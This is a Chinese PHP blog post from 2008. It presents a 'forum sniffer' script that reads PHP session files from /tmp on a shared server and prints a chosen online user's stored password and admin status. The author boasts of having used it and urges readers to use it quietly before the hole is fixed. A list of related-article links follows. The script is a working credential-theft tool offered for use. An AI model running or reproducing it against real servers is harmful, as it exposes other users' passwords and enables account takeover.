php查看session内容的函数


Posted in PHP onAugust 27, 2008

如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
模拟xcopy的函数
Oct 09 PHP
深入理解PHP原理之Session Gc的一个小概率Notice
Apr 12 PHP
PHP中的函数嵌套层数限制分析
Jun 13 PHP
hadoop常见错误以及处理方法详解
Jun 19 PHP
浅析php单例模式
Nov 25 PHP
PHP 开发者该知道的 5 个 Composer 小技巧
Feb 03 PHP
php 数组随机取值的简单实例
May 23 PHP
PHP基本语法实例总结
Sep 09 PHP
CI框架使用composer安装的依赖包步骤与方法分析
Nov 21 PHP
PHP简单装饰器模式实现与用法示例
Jun 22 PHP
PHP封装的XML简单操作类完整实例
Nov 13 PHP
PHP代码重构方法漫谈
Apr 17 PHP
php 缓存函数代码
Aug 27 #PHP
php 中文处理函数集合
Aug 27 #PHP
常用的php对象类型判断
Aug 27 #PHP
phpMyAdmin2.11.6安装配置方法
Aug 24 #PHP
PHP6 先修班 JSON实例代码
Aug 23 #PHP
php的curl实现get和post的代码
Aug 23 #PHP
PHP Smarty生成EXCEL文档的代码
Aug 23 #PHP
You might like
实现树状结构的两种方法
2006/10/09 PHP
php上传图片类及用法示例
2016/05/11 PHP
php从数据库中获取数据用ajax传送到前台的方法
2018/08/20 PHP
js 通用javascript函数库整理
2011/08/14 Javascript
Javascript Request获取请求参数如何实现
2012/11/28 Javascript
解析js原生方法创建表格效率测试
2013/07/08 Javascript
一个jquery实现的不错的多行文字图片滚动效果
2014/09/28 Javascript
用Node.js通过sitemap.xml批量抓取美女图片
2015/05/28 Javascript
jQuery自定义数值抽奖活动代码
2016/06/11 Javascript
easyui关于validatebox实现多重规则验证的方法(必看)
2017/04/12 Javascript
CheckBox多选取值及判断CheckBox选中是否为空的实例
2017/10/31 Javascript
jQuery仿移动端支付宝键盘的实现代码
2018/08/15 jQuery
JS加密插件CryptoJS实现的DES加密示例
2018/08/16 Javascript
nodejs初始化init的示例代码
2018/10/10 NodeJs
Vue-cli3.x + axios 跨域方案踩坑指北
2019/07/04 Javascript
使用Vue调取接口,并渲染数据的示例代码
2019/10/28 Javascript
vue单文件组件无法获取$refs的问题
2020/06/24 Javascript
解决VUE项目localhost端口服务器拒绝连接,只能用127.0.0.1的问题
2020/08/14 Javascript
node脚手架搭建服务器实现token验证的方法
2021/01/20 Javascript
理解Python垃圾回收机制
2016/02/12 Python
Selenium+Python 自动化操控登录界面实例(有简单验证码图片校验)
2019/06/28 Python
Python Numpy库datetime类型的处理详解
2019/07/13 Python
使用pytorch实现可视化中间层的结果
2019/12/30 Python
Python使用pyexecjs代码案例解析
2020/07/13 Python
Python通过队列来实现进程间通信的示例
2020/10/14 Python
俄罗斯眼镜网: optikaworld
2016/07/31 全球购物
LINUX下线程,GDI类的解释
2012/04/17 面试题
酒店应聘自荐信
2013/11/09 职场文书
酒店实习个人鉴定
2013/12/07 职场文书
文明礼貌演讲稿
2014/05/12 职场文书
春节慰问信范文
2015/02/15 职场文书
我是特种兵观后感
2015/06/11 职场文书
2020年元旦祝福语录,总有适合你的
2019/12/31 职场文书
JPA 通过Specification如何实现复杂查询
2021/11/23 Java/Android
口袋妖怪冰系十大最强精灵,几何雪花排第七,第六类似北极熊
2022/03/18 日漫
Python实现Hash算法
2022/03/18 Python